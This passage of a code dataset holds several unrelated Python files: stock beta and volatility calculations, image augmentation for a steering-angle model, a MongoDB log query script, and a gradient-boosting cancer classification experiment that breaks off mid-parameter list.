= pd.DataFrame(columns=['ticker', 'cov', 'beta', 'sd', 'tr', 'cv'])\r\n df_out_m6 = pd.DataFrame(columns=['ticker', 'cov', 'beta', 'sd', 'tr', 'cv'])\r\n df_out_m9 = pd.DataFrame(columns=['ticker', 'cov', 'beta', 'sd', 'tr', 'cv'])\r\n df_out_y1 = pd.DataFrame(columns=['ticker', 'cov', 'beta', 'sd', 'tr', 'cv'])\r\n df_out_y2 = pd.DataFrame(columns=['ticker', 'cov', 'beta', 'sd', 'tr', 'cv'])\r\n df_out_y3 = pd.DataFrame(columns=['ticker', 'cov', 'beta', 'sd', 'tr', 'cv'])\r\n\r\n i = 0 # This is for counting the for loop below.\r\n for row in reader: # Looping through stock files.\r\n ticker = row[0]\r\n file_url = \"Beta/outData/stocks/\" + ticker + \".csv\"\r\n df = pd.read_csv(file_url)\r\n\r\n # Calculating covariance of index return values and stock return values.\r\n cov_1_month = calcCov(today, last_1_month, df)\r\n cov_3_month = calcCov(today, last_3_month, df)\r\n cov_6_month = calcCov(today, last_6_month, df)\r\n cov_9_month = calcCov(today, last_9_month, df)\r\n cov_1_year = calcCov(today, last_1_year, df)\r\n cov_2_year = calcCov(today, last_2_year, df)\r\n cov_3_year = calcCov(today, last_3_year, df)\r\n\r\n # Calculating beta for stocks.\r\n beta_1_month = 
calcBeta(today, last_1_month, df, cov_1_month)\r\n beta_3_month = calcBeta(today, last_3_month, df, cov_3_month)\r\n beta_6_month = calcBeta(today, last_6_month, df, cov_6_month)\r\n beta_9_month = calcBeta(today, last_9_month, df, cov_9_month)\r\n beta_1_year = calcBeta(today, last_1_year, df, cov_1_year)\r\n beta_2_year = calcBeta(today, last_2_year, df, cov_2_year)\r\n beta_3_year = calcBeta(today, last_3_year, df, cov_3_year)\r\n\r\n # Calculating standard deviation for stocks.\r\n sd_1_month = calcSD(today, last_1_month, df)\r\n sd_3_month = calcSD(today, last_3_month, df)\r\n sd_6_month = calcSD(today, last_6_month, df)\r\n sd_9_month = calcSD(today, last_9_month, df)\r\n sd_1_year = calcSD(today, last_1_year, df)\r\n sd_2_year = calcSD(today, last_2_year, df)\r\n sd_3_year = calcSD(today, last_3_year, df)\r\n\r\n # Calculating total return value for stocks.\r\n tr_1_month = calcTotalReturn(today, last_1_month, df)\r\n tr_3_month = calcTotalReturn(today, last_3_month, df)\r\n tr_6_month = calcTotalReturn(today, last_6_month, df)\r\n tr_9_month = calcTotalReturn(today, last_9_month, df)\r\n tr_1_year = calcTotalReturn(today, last_1_year, df)\r\n tr_2_year = calcTotalReturn(today, last_2_year, df)\r\n tr_3_year = calcTotalReturn(today, last_3_year, df)\r\n\r\n # Calculating CV for stocks.\r\n cv_1_month = calcCV(today, last_1_month, df, sd_1_month, tr_1_month)\r\n cv_3_month = calcCV(today, last_3_month, df, sd_3_month, tr_3_month)\r\n cv_6_month = calcCV(today, last_6_month, df, sd_6_month, tr_6_month)\r\n cv_9_month = calcCV(today, last_9_month, df, sd_9_month, tr_9_month)\r\n cv_1_year = calcCV(today, last_1_year, df, sd_1_year, tr_1_year)\r\n cv_2_year = calcCV(today, last_2_year, df, sd_2_year, tr_2_year)\r\n cv_3_year = calcCV(today, last_3_year, df, sd_3_year, tr_3_year)\r\n\r\n df_out_m1.loc[i] = [ticker, cov_1_month, beta_1_month, sd_1_month, tr_1_month, cv_1_month]\r\n df_out_m3.loc[i] = [ticker, cov_3_month, beta_3_month, sd_3_month, tr_3_month, cv_3_month]\r\n df_out_m6.loc[i] = [ticker, cov_6_month, beta_6_month, sd_6_month, tr_6_month, cv_6_month]\r\n df_out_m9.loc[i] = [ticker, cov_9_month, beta_9_month, sd_9_month, tr_9_month, cv_9_month]\r\n df_out_y1.loc[i] = [ticker, cov_1_year, beta_1_year, sd_1_year, tr_1_year, cv_1_year]\r\n df_out_y2.loc[i] = [ticker, cov_2_year, beta_2_year, sd_2_year, tr_2_year, cv_2_year]\r\n df_out_y3.loc[i] = [ticker, cov_3_year, beta_3_year, sd_3_year, tr_3_year, cv_3_year]\r\n i += 1\r\n\r\n df_out_m1.to_csv(\"Beta/outData/m1.csv\", index=False, encoding='utf-8-sig')\r\n df_out_m3.to_csv(\"Beta/outData/m3.csv\", index=False, encoding='utf-8-sig')\r\n df_out_m6.to_csv(\"Beta/outData/m6.csv\", index=False, encoding='utf-8-sig')\r\n df_out_m9.to_csv(\"Beta/outData/m9.csv\", index=False, encoding='utf-8-sig')\r\n df_out_y1.to_csv(\"Beta/outData/y1.csv\", index=False, encoding='utf-8-sig')\r\n df_out_y2.to_csv(\"Beta/outData/y2.csv\", index=False, encoding='utf-8-sig')\r\n df_out_y3.to_csv(\"Beta/outData/y3.csv\", index=False, encoding='utf-8-sig')", "repo_name": "parsaakbari1209/analysis-table-for-tehran-stock-exchange", "sub_path": "Beta/outData/calcTableData.py", "file_name": "calcTableData.py", "file_ext": "py", "file_size_in_byte": 7045, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 4, "dataset": "github-code", "pt": "53", "api": [{"api_name": "numpy.cov", "line_number": 11, "usage_type": "call"}, {"api_name": "numpy.var", "line_number": 15, "usage_type": "call"}, {"api_name": "numpy.std", "line_number": 20, 
"usage_type": "call"}, {"api_name": "numpy.sum", "line_number": 24, "usage_type": "call"}, {"api_name": "csv.reader", "line_number": 37, "usage_type": "call"}, {"api_name": "datetime.date.today", "line_number": 40, "usage_type": "call"}, {"api_name": "datetime.date", "line_number": 40, "usage_type": "attribute"}, {"api_name": "dateutil.relativedelta.relativedelta.relativedelta", "line_number": 41, "usage_type": "call"}, {"api_name": "dateutil.relativedelta.relativedelta", "line_number": 41, "usage_type": "attribute"}, {"api_name": "dateutil.relativedelta", "line_number": 41, "usage_type": "name"}, {"api_name": "dateutil.relativedelta.relativedelta.relativedelta", "line_number": 42, "usage_type": "call"}, {"api_name": "dateutil.relativedelta.relativedelta", "line_number": 42, "usage_type": "attribute"}, {"api_name": "dateutil.relativedelta", "line_number": 42, "usage_type": "name"}, {"api_name": "dateutil.relativedelta.relativedelta.relativedelta", "line_number": 43, "usage_type": "call"}, {"api_name": "dateutil.relativedelta.relativedelta", "line_number": 43, "usage_type": "attribute"}, {"api_name": "dateutil.relativedelta", "line_number": 43, "usage_type": "name"}, {"api_name": "dateutil.relativedelta.relativedelta.relativedelta", "line_number": 44, "usage_type": "call"}, {"api_name": "dateutil.relativedelta.relativedelta", "line_number": 44, "usage_type": "attribute"}, {"api_name": "dateutil.relativedelta", "line_number": 44, "usage_type": "name"}, {"api_name": "dateutil.relativedelta.relativedelta.relativedelta", "line_number": 45, "usage_type": "call"}, {"api_name": "dateutil.relativedelta.relativedelta", "line_number": 45, "usage_type": "attribute"}, {"api_name": "dateutil.relativedelta", "line_number": 45, "usage_type": "name"}, {"api_name": "dateutil.relativedelta.relativedelta.relativedelta", "line_number": 46, "usage_type": "call"}, {"api_name": "dateutil.relativedelta.relativedelta", "line_number": 46, "usage_type": "attribute"}, {"api_name": "dateutil.relativedelta", "line_number": 46, "usage_type": "name"}, {"api_name": "dateutil.relativedelta.relativedelta.relativedelta", "line_number": 47, "usage_type": "call"}, {"api_name": "dateutil.relativedelta.relativedelta", "line_number": 47, "usage_type": "attribute"}, {"api_name": "dateutil.relativedelta", "line_number": 47, "usage_type": "name"}, {"api_name": "pandas.DataFrame", "line_number": 50, "usage_type": "call"}, {"api_name": "pandas.DataFrame", "line_number": 51, "usage_type": "call"}, {"api_name": "pandas.DataFrame", "line_number": 52, "usage_type": "call"}, {"api_name": "pandas.DataFrame", "line_number": 53, "usage_type": "call"}, {"api_name": "pandas.DataFrame", "line_number": 54, "usage_type": "call"}, {"api_name": "pandas.DataFrame", "line_number": 55, "usage_type": "call"}, {"api_name": "pandas.DataFrame", "line_number": 56, "usage_type": "call"}, {"api_name": "pandas.read_csv", "line_number": 62, "usage_type": "call"}]}
+{"seq_id": "71464644649", "text": "import concurrent.futures\nimport cv2\nimport matplotlib.image as mpimg\nimport numpy as np\nimport os\n\nORIGINAL_IMAGE_HEIGHT, ORIGINAL_IMAGE_WIDTH = 160, 320\nIMAGE_HEIGHT, IMAGE_WIDTH, IMAGE_CHANNELS = 66, 200, 3\nINPUT_SHAPE = (IMAGE_HEIGHT, IMAGE_WIDTH, IMAGE_CHANNELS)\n\nclass ImageLoader:\n def __init__(self, data_dir, image_paths):\n n_images = image_paths.shape[0]\n self.n_images = n_images\n\n print('Loading %d images from %s...' % (n_images, data_dir))\n\n self.center = np.empty([n_images, ORIGINAL_IMAGE_HEIGHT, ORIGINAL_IMAGE_WIDTH, IMAGE_CHANNELS], dtype=np.uint8)\n self.left = np.empty([n_images, ORIGINAL_IMAGE_HEIGHT, ORIGINAL_IMAGE_WIDTH, IMAGE_CHANNELS], dtype=np.uint8)\n self.right = np.empty([n_images, ORIGINAL_IMAGE_HEIGHT, ORIGINAL_IMAGE_WIDTH, IMAGE_CHANNELS], dtype=np.uint8)\n\n for idx, img in enumerate(image_paths):\n center, left, right = img\n self.center[idx] = self._load_image(data_dir, center)\n self.left[idx] = self._load_image(data_dir, left)\n self.right[idx] = self._load_image(data_dir, right)\n\n print('Loaded %d images from %s...' % (n_images, data_dir))\n\n def _load_image(self, data_dir, image_file):\n return mpimg.imread(os.path.join(data_dir, image_file))\n\n# preprocess an image\ndef crop(image):\n return image[60:-25, :]\n\ndef resize(image):\n return cv2.resize(image, (IMAGE_WIDTH, IMAGE_HEIGHT), cv2.INTER_AREA)\n\ndef rgb2yuv(image):\n return cv2.cvtColor(image, cv2.COLOR_RGB2YUV)\n\ndef preprocess(image):\n return rgb2yuv(resize(crop(image)))\n\n# augument the image\ndef choose_image(image_loader, idx, steering_angle):\n choice = np.random.choice(3)\n if choice == 0:\n return image_loader.left[idx], steering_angle + 0.2\n elif choice == 1:\n return image_loader.right[idx], steering_angle - 0.2\n return image_loader.center[idx], steering_angle\n\ndef random_flip(img):\n if np.random.rand() < 0.5:\n img = cv2.flip(img, 1)\n return img\n\ndef random_translate(img, range_x, range_y):\n trans_x = range_x * (np.random.rand() - 0.5)\n trans_y = range_y * (np.random.rand() - 0.5)\n trans_m = np.float32([[1, 0, trans_x],\n [0, 1, trans_y]])\n h, w = img.shape[:2]\n return cv2.warpAffine(img, trans_m, (w, h))\n\ndef random_brightness(img):\n hsv = cv2.cvtColor(img, cv2.COLOR_RGB2HSV)\n ratio = 1.0 + 0.2 * (np.random.rand() - 0.5)\n hsv[:, :, 2] = hsv[:, :, 2] * ratio\n return cv2.cvtColor(hsv, cv2.COLOR_HSV2RGB)\n\ndef augument(img, range_x=100, range_y=10):\n img = random_flip(img)\n img = random_brightness(img)\n img = random_translate(img, range_x, range_y)\n return img\n\ndef random_batch(n_images, batch_size):\n perm = np.random.permutation(n_images)\n i = 0\n\n while i < n_images:\n bs = np.min([batch_size, n_images - i])\n yield perm[i:(i + bs)]\n i += bs\n\ndef process_mini_batch(indexes, il, steering_angles, is_training):\n batch_size = indexes.shape[0]\n images = np.empty([batch_size, IMAGE_HEIGHT, IMAGE_WIDTH, IMAGE_CHANNELS])\n steers = np.empty(batch_size)\n\n for k, j in enumerate(indexes):\n steering_angle = steering_angles[j]\n if is_training:\n image, steering_angle = choose_image(il, j, steering_angle)\n image = augument(image)\n else:\n image = il.center[j]\n images[k] = preprocess(image)\n steers[k] = steering_angle\n\n return images, steers\n\ndef batch_generator(data_dir, image_paths, steering_angles, batch_size, is_training):\n il = ImageLoader(data_dir, image_paths)\n\n images = np.empty([batch_size, IMAGE_HEIGHT, IMAGE_WIDTH, IMAGE_CHANNELS])\n steers = np.empty(batch_size)\n\n num_workers = 
8\n executor = concurrent.futures.ThreadPoolExecutor(max_workers=num_workers)\n\n while True:\n for indexes in random_batch(il.n_images, batch_size):\n fut = [ executor.submit(process_mini_batch, mb, il, steering_angles, is_training) for mb in np.array_split(indexes, num_workers) ]\n\n j = 0\n for f in concurrent.futures.as_completed(fut):\n try:\n img_batch, st_batch = f.result()\n except Exception as e:\n print('Caught an exception: ', e)\n else:\n sz = img_batch.shape[0]\n images[j:(j+sz)] = img_batch\n steers[j:(j+sz)] = st_batch\n j += sz\n yield images, steers\n\n", "repo_name": "khvorov/tf-learn", "sub_path": "sdc/utils.py", "file_name": "utils.py", "file_ext": "py", "file_size_in_byte": 4533, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "numpy.empty", "line_number": 18, "usage_type": "call"}, {"api_name": "numpy.uint8", "line_number": 18, "usage_type": "attribute"}, {"api_name": "numpy.empty", "line_number": 19, "usage_type": "call"}, {"api_name": "numpy.uint8", "line_number": 19, "usage_type": "attribute"}, {"api_name": "numpy.empty", "line_number": 20, "usage_type": "call"}, {"api_name": "numpy.uint8", "line_number": 20, "usage_type": "attribute"}, {"api_name": "matplotlib.image.imread", "line_number": 31, "usage_type": "call"}, {"api_name": "matplotlib.image", "line_number": 31, "usage_type": "name"}, {"api_name": "os.path.join", "line_number": 31, "usage_type": "call"}, {"api_name": "os.path", "line_number": 31, "usage_type": "attribute"}, {"api_name": "cv2.resize", "line_number": 38, "usage_type": "call"}, {"api_name": "cv2.INTER_AREA", "line_number": 38, "usage_type": "attribute"}, {"api_name": "cv2.cvtColor", "line_number": 41, "usage_type": "call"}, {"api_name": "cv2.COLOR_RGB2YUV", "line_number": 41, "usage_type": "attribute"}, {"api_name": "numpy.random.choice", "line_number": 48, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 48, "usage_type": "attribute"}, {"api_name": "numpy.random.rand", "line_number": 56, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 56, "usage_type": "attribute"}, {"api_name": "cv2.flip", "line_number": 57, "usage_type": "call"}, {"api_name": "numpy.random.rand", "line_number": 61, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 61, "usage_type": "attribute"}, {"api_name": "numpy.random.rand", "line_number": 62, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 62, "usage_type": "attribute"}, {"api_name": "numpy.float32", "line_number": 63, "usage_type": "call"}, {"api_name": "cv2.warpAffine", "line_number": 66, "usage_type": "call"}, {"api_name": "cv2.cvtColor", "line_number": 69, "usage_type": "call"}, {"api_name": "cv2.COLOR_RGB2HSV", "line_number": 69, "usage_type": "attribute"}, {"api_name": "numpy.random.rand", "line_number": 70, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 70, "usage_type": "attribute"}, {"api_name": "cv2.cvtColor", "line_number": 72, "usage_type": "call"}, {"api_name": "cv2.COLOR_HSV2RGB", "line_number": 72, "usage_type": "attribute"}, {"api_name": "numpy.random.permutation", "line_number": 81, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 81, "usage_type": "attribute"}, {"api_name": "numpy.min", "line_number": 85, "usage_type": "call"}, {"api_name": "numpy.empty", "line_number": 91, "usage_type": "call"}, {"api_name": "numpy.empty", "line_number": 92, "usage_type": "call"}, {"api_name": "numpy.empty", "line_number": 109, 
"usage_type": "call"}, {"api_name": "numpy.empty", "line_number": 110, "usage_type": "call"}, {"api_name": "concurrent.futures.futures.ThreadPoolExecutor", "line_number": 113, "usage_type": "call"}, {"api_name": "concurrent.futures.futures", "line_number": 113, "usage_type": "attribute"}, {"api_name": "concurrent.futures", "line_number": 113, "usage_type": "name"}, {"api_name": "numpy.array_split", "line_number": 117, "usage_type": "call"}, {"api_name": "concurrent.futures.futures.as_completed", "line_number": 120, "usage_type": "call"}, {"api_name": "concurrent.futures.futures", "line_number": 120, "usage_type": "attribute"}, {"api_name": "concurrent.futures", "line_number": 120, "usage_type": "name"}]}
+{"seq_id": "71567457768", "text": "#! /usr/bin/env python2\n# -*- coding: utf-8 -*-\n\"\"\"\nModule: find.py\nCreated on Wed Sep 04 22:09:01 2013\n@author: gav\nDescription: Find records of jobs in mongodb\n\n\"\"\"\n### Imports\nfrom __future__ import print_function\n\nfrom pymongo import MongoClient\n### Logging ###\nimport logging\nlogging.basicConfig(level=logging.DEBUG)\ndebug, info, error = logging.debug, logging.info, logging.error\n\n### Constants\nMONGO_ADDR = 'mongodb://tornado:27017/'\nMONGO_DB = 'bonaparte_log'\nMONGO_COLLECTION = 'message_atoms'\n### Classes\n\n### Functions ###\ndef filter_(ma):\n return {\n \"host\": ma[\"host\"],\n \"stage\": ma['q_stage'],\n \"time_recv\": ma[\"time_recv\"],\n \"time_sent\": ma[\"time_sent\"],\n }\n\ndef my_print(ma):\n tpl = \"host: {h}, sent: {ts}, recv: {tr}, stage: {s}\"\n rec = tpl.format(h=ma[\"host\"],\n tr=ma[\"time_recv\"].strftime(\"%H:%M:%S\"),\n ts=ma[\"time_sent\"].strftime(\"%H:%M:%S\"),\n s=ma[\"stage\"])\n print(rec)\n\n### Tests\n\nif __name__ == \"__main__\":\n\n # setup\n client = MongoClient(MONGO_ADDR)\n db = client.bonaparte_log\n atoms = db.bonaparte_log\n\n #validate stem\n# stem = \"DIESEL_XENA_Q1_019\"\n stem = \"DIESEL_XENA_Q3_074\"\n query = {\n \"stem\": stem\n }\n # return elements with stem\n for job in atoms.find(query).sort(\"time_recv\"):\n print(job)\n print()\n# display_atom = filter_(job)\n# my_print(display_atom)\n\n\n print(\"Done __main__\")\n\n", "repo_name": "gjcoombes/joseph", "sub_path": "modules/winfates/find.py", "file_name": "find.py", "file_ext": "py", "file_size_in_byte": 1485, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "logging.basicConfig", "line_number": 16, "usage_type": "call"}, {"api_name": "logging.DEBUG", "line_number": 16, "usage_type": "attribute"}, {"api_name": "logging.debug", "line_number": 17, "usage_type": "attribute"}, {"api_name": "logging.info", "line_number": 17, "usage_type": "attribute"}, {"api_name": "logging.error", "line_number": 17, "usage_type": "attribute"}, {"api_name": "pymongo.MongoClient", "line_number": 47, "usage_type": "call"}]}
+{"seq_id": "34519983151", "text": "import pandas as pd\n\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport sys\nimport time\nfrom sklearn.pipeline import make_pipeline\nfrom skrebate import ReliefF\nfrom sklearn.ensemble import RandomForestClassifier\nfrom sklearn.model_selection import cross_val_score, train_test_split, LeaveOneOut, KFold, StratifiedKFold\nfrom sklearn import preprocessing\nfrom sklearn import svm\nfrom sklearn.svm import LinearSVC\nfrom sklearn.metrics import roc_auc_score,confusion_matrix,roc_curve,auc\nimport matplotlib.pyplot as plt\n# # # #\ndef loadDataset(filename, train_X=[], train_Y=[]):\n # filename是划分训练集和测试集文件夹中的训练集train.txt\n f = open(filename)\n lines = f.readlines()\n\n dataMat = []\n N = len(lines)\n for i in range(0, N):\n data = lines[i].strip().split(\",\")\n dataMat.append(data)\n N_i = len(dataMat)\n N_j = len(dataMat[0])\n\n for i in range(0, N_i):\n Y = dataMat[i][N_j-1] #标签\n if (Y == '1'): # 正常\n train_Y.append(1)\n else:\n train_Y.append(2)\n\n for index in range(0, len(dataMat[i])):\n dataMat[i][index] = float(dataMat[i][index])\n\n lines1=[]\n for j in range(0,N_j-1):\n lines1.append(float(dataMat[i][j]))\n train_X.append(lines1) #要去掉最后一列label\n\ndef recover(filename,filename1,filename2):\n f = open(filename)\n lines = f.readlines() #top60特征\n #print(lines)\n\n # print(len(lines))\n f1 = open(filename1)\n lines1 = f1.readlines() #原始数据,文件为feature.csv\n #print(lines1)\n dataMat = [] #存放基因名\n dataMat1 = []\n for i in range(0, len(lines)):\n data = lines[i].strip().split('\\t')\n\n dataMat.append(data)\n # print(dataMat[0])\n\n f2 = open(filename2, 'w')\n #f2.write(lines[0]) #将基因名写入f2\n\n for j in range(0, len(lines1)): #train.csv\n data1 = lines1[j].strip().split(',')\n dataMat1.append(data1)\n\n #print(dataMat1[0][1])\n\n N_i = len(dataMat1) #行数\n N_j = len(dataMat1[0]) #列数\n\n for i in range(0,N_i) :\n #temp = dataMat1[i][0]\n # #print(temp)\n #print(i+1)\n for k in range(0,len(dataMat)):\n for j in range(0, N_j):\n if dataMat[k][0] == dataMat1[0][j]:\n #print(dataMat[k][0])\n f2.write(dataMat1[i][j])\n f2.write(',')\n f2.write(dataMat1[i][N_j-1]) #将标签写进去\n f2.write('\\n')\n f2.close()\n\n\n#\n########################将训练集、测试集、验证集 按照GBDT——feature 做特征选择\n# fileDir = r\"C:\\Users\\JQ\\experiment\\data\\BREA\"\n# filepath = fileDir + \"\\learn_test\"\n# filename = fileDir +'\\\\GBDT_R_features.txt'\n# filename1 = filepath +'\\\\train.csv'\n# filename2 = filepath +'\\\\final_R_train.csv'\n# filename3 = filepath +'\\\\valid.csv'\n# filename4 = filepath +'\\\\final_R_valid.csv'\n# #\n# Dir = r\"C:\\Users\\JQ\\experiment\\data\\BREA\\learn_test\"\n# file_test = Dir +\"\\\\test.csv\"\n# filename_test = Dir +\"\\\\final_R_test.csv\"\n# #\n# recover(filename,file_test,filename_test) #534个样本恢复\n# recover(filename,filename1,filename2)\n# recover(filename,filename3,filename4)\n\n\ndef balance(y_pred,y_valid,y_pred_t,y_test):\n tumor = 0\n normal = 0\n tumor_sum = 0\n normal_sum = 0\n for i in range(0, len(y_valid)):\n if y_valid[i] == 1:\n tumor_sum += 1\n else:\n normal_sum += 1\n\n for i in range(0, len(y_pred)):\n\n if y_valid[i] == 1 & y_pred[i] == y_valid[i]:\n tumor += 1\n if y_valid[i] == 2 & y_pred[i] == y_valid[i]:\n normal += 1\n tumor_ratio = tumor / tumor_sum #####癌症样本准确率\n normal_ratio = normal / normal_sum ###正常样本准确率\n\n tumor_t = 0\n normal_t = 0\n tumor_t_sum = 0\n normal_t_sum = 0\n for i in range(0, len(y_test)):\n if y_test[i] == 1:\n tumor_t_sum += 1\n else:\n normal_t_sum += 1\n\n for i in range(0, len(y_pred_t)):\n\n if 
y_test[i] == 1 & y_pred_t[i] == y_test[i]:\n tumor_t += 1\n if y_test[i] == 2 & y_pred_t[i] == y_test[i]:\n normal_t += 1\n tumor_t_ratio = tumor_t / tumor_t_sum #####癌症样本准确率\n normal_t_ratio = normal_t / normal_t_sum ###正常样本准确率\n\n balance_acc_test = (tumor_t_ratio * tumor_ratio + normal_t_ratio * normal_ratio) /2\n\n return balance_acc_test\n\ndef metrics(confusion):\n acc= (confusion[0][0]+confusion[1][1])/(confusion[0][0]+confusion[0][1]+confusion[1][0]+confusion[1][1])\n ses = confusion[0][0] /(confusion[0][0]+confusion[0][1])\n spc = confusion[1][1]/(confusion[1][1]+confusion[1][0])\n prc = confusion[0][0]/(confusion[0][0]+confusion[1][0])\n f1 = 2*confusion[0][0]/(2*confusion[0][0]+confusion[1][0]+confusion[0][1])\n\n # print(\"acc:\"+str(acc))\n # print(\"sec:\" +str(ses))\n # print(\"spc:\" +str(spc))\n # print(\"prc:\" +str(prc))\n # print(\"f1:\"+ str(f1))\n return acc,ses,spc,prc,f1\n\n\ngbdt_acc = []\ngbdt_b_acc =[]\ngbdt_ses =[]\ngbdt_spc=[]\ngbdt_prc=[]\ngbdt_f1 =[]\ngbdt_auc =[]\n\n\nfor i in range(1,11):\n filename = r\"C:\\Users\\JQ\\experiment\\data\\BREA\\split\"\n data = pd.read_csv(filename + \"\\\\\" + str(i) + \"\\\\train.csv\") # 全体特征\n x_columns = []\n for x in data.columns:\n if x not in ['label']:\n x_columns.append(x)\n X = data[x_columns]\n y = data['label']\n x_train = data[x_columns]\n y_train = data['label']\n\n data = pd.read_csv(filename + \"\\\\\" + str(i) + \"\\\\valid.csv\")\n x_columns = []\n for x in data.columns:\n if x not in ['label']:\n x_columns.append(x)\n x_valid = data[x_columns]\n y_valid = data['label']\n\n data = pd.read_csv(filename + \"\\\\\" + str(i) + \"\\\\test.csv\")\n x_columns = []\n for x in data.columns:\n if x not in ['label']:\n x_columns.append(x)\n x_test = data[x_columns]\n y_test = data['label']\n\n # from sklearn import svm\n # clf_svm = svm.SVC(kernel='linear')\n # clf_svm.fit(x_train,y_train)\n # y_svm_pred = clf_svm.predict(x_valid)\n # y_svm_pred_t = clf_svm.predict(x_test)\n # balance1 = balance(y_svm_pred,y_valid,y_svm_pred_t,y_test)\n # auc_svm = roc_auc_score(y_test,y_svm_pred_t)\n # svm_confusion = confusion_matrix(y_test,y_svm_pred_t)\n # print(\"balance SVM:\" + str(balance1))\n # print(\"AUC_SVM:\"+str(auc_svm))\n # print(\"SVM confusion:\")\n # metrics(svm_confusion)\n #\n # from sklearn.ensemble import RandomForestClassifier\n #\n # RF = RandomForestClassifier(n_estimators=20)\n # RF.fit(x_train,y_train)\n # y_RF_pred = RF.predict(x_valid)\n # y_RF_pred_t = RF.predict(x_test)\n # balance2 = balance(y_RF_pred,y_valid,y_RF_pred_t,y_test)\n # auc_RF = roc_auc_score(y_test,y_RF_pred_t)\n # RF_confusion = confusion_matrix(y_test,y_RF_pred_t)\n # print(\"balance RF:\" + str(balance2))\n # print(\"AUC_RF:\"+str(auc_RF))\n # print(\"RF confusion:\")\n # metrics(RF_confusion)\n #\n # from sklearn.ensemble import RandomForestClassifier\n #\n # # from sklearn.cross_validation import cross_val_score, ShuffleSplit\n # RF_2 = RandomForestClassifier(n_estimators=1000)\n # RF_2.fit(x_train, y_train)\n # y_RF_2_pred =RF_2.predict(x_valid)\n # y_RF_2_pred_t = RF_2.predict(x_test)\n # balance3 = balance(y_RF_2_pred,y_valid,y_RF_2_pred_t,y_test)\n # auc_RF2 =roc_auc_score(y_test,y_RF_2_pred_t)\n # RF2_confusion = confusion_matrix(y_test,y_RF_2_pred_t)\n # print(\"balance RF2:\" + str(balance3))\n # print(\"AUC_RF2:\"+str(auc_RF2))\n # print(\"RF2 confusion:\")\n # metrics(RF2_confusion)\n #\n # from sklearn import tree\n #\n # clf_tree = tree.DecisionTreeClassifier(criterion='entropy')\n # clf_tree = clf_tree.fit(x_train, 
y_train)\n # y_TREE_pred = clf_tree.predict(x_valid)\n # y_TREE_pred_t = clf_tree.predict(x_test)\n # balance4 = balance(y_TREE_pred,y_valid,y_TREE_pred_t,y_test)\n # auc_tree =roc_auc_score(y_test,y_TREE_pred_t)\n # tree_confusion = confusion_matrix(y_test,y_TREE_pred_t)\n # print(\"balance TREE:\" + str(balance4))\n # print(\"AUC_tree:\"+str(auc_tree))\n # print(\"TREE confusion:\")\n # metrics(tree_confusion)\n #\n # # from sklearn import tree\n # #\n # # clf_tree1 = tree.DecisionTreeClassifier() #默认基尼系数\n # # clf_tree1 = clf_tree.fit(x_train, y_train)\n #\n # from sklearn import neighbors\n #\n # clf_knn = neighbors.KNeighborsClassifier()\n # clf_knn.fit(x_train,y_train)\n # y_knn_pred = clf_knn.predict(x_valid)\n # y_knn_pred_t = clf_knn.predict(x_test)\n # balance5 = balance(y_knn_pred,y_valid,y_knn_pred_t,y_test)\n # auc_knn =roc_auc_score(y_test,y_knn_pred_t)\n # knn_confusion = confusion_matrix(y_test,y_knn_pred_t)\n # print(\"balance KNN:\" + str(balance5))\n # print(\"AUC_knn:\"+str(auc_knn))\n # print(\"knn confusion:\")\n # metrics(knn_confusion)\n\n from sklearn.ensemble import GradientBoostingClassifier\n\n gbr = GradientBoostingClassifier(\n # n_estimators=74,\n # max_depth=19,\n # min_samples_leaf=36,\n # min_samples_split=67,\n # learning_rate=0.33653933039595074, #####0.8165,\n # subsample=0.96259334356605,\n # random_state=10\n # )\n\n # n_estimators=127,\n # max_depth=9,\n # min_samples_leaf=17,\n # min_samples_split=20,\n # learning_rate= 0.1889, #####0.8165,\n # subsample=0.8139,\n # random_state=10\n # )\n ########11111111111111111111111111111111111111BO##########################################\n # n_estimators = 235,\n # max_depth = 19,\n # min_samples_leaf = 46,\n # min_samples_split = 58,\n # learning_rate = 0.04838582279938517, #####0.8165,\n # subsample = 0.9891359053949287,\n # random_state = 10\n # )\n ###########11111111111111111111111RD##########################\n # n_estimators = 271,\n # max_depth = 23,\n # min_samples_leaf = 53,\n # min_samples_split = 55,\n # learning_rate = 0.1594398172778165, #####0.8165,\n # subsample = 0.8231493992953516,\n # random_state = 10\n # )\n ##########222222222222222222BO##################最优\n n_estimators = 374,\n max_depth = 29,\n min_samples_leaf = 88,\n min_samples_split = 12,\n learning_rate =0.5373220899834616, #####0.8165,\n subsample = 0.846203750084136,\n random_state = 10\n )\n ###############2222222222222RD\n # n_estimators = 67,\n # max_depth = 20,\n # min_samples_leaf = 93,\n # min_samples_split = 35,\n # learning_rate = 0.030286120485679326, #####0.8165,\n # subsample = 0.8328799036070788,\n # random_state = 10\n # )\n #############################333333333333333BO\n # n_estimators = 358,\n # max_depth = 23,\n # min_samples_leaf = 52,\n # min_samples_split = 70,\n # learning_rate = 0.2797941215670739, #####0.8165,\n # subsample = 0.9321368111903375,\n # random_state = 10\n # )\n ##################################333333RD\n # n_estimators=82,\n # max_depth=42,\n # min_samples_leaf=56,\n # min_samples_split=64,\n # learning_rate=0.14537979952691704, #####0.8165,\n # subsample=0.9760518597431092,\n # random_state=10\n # )\n\n#####################444444444BO\n # n_estimators=412,\n # max_depth=9,\n # min_samples_leaf=60,\n # min_samples_split=72,\n # learning_rate=0.20479554131615968, #####0.8165,\n # subsample=0.9958775857920726,\n # random_state=10\n # )\n######################44444444RD\n# n_estimators = 416,\n# max_depth = 12,\n# min_samples_leaf = 32,\n# min_samples_split = 44,\n# learning_rate = 
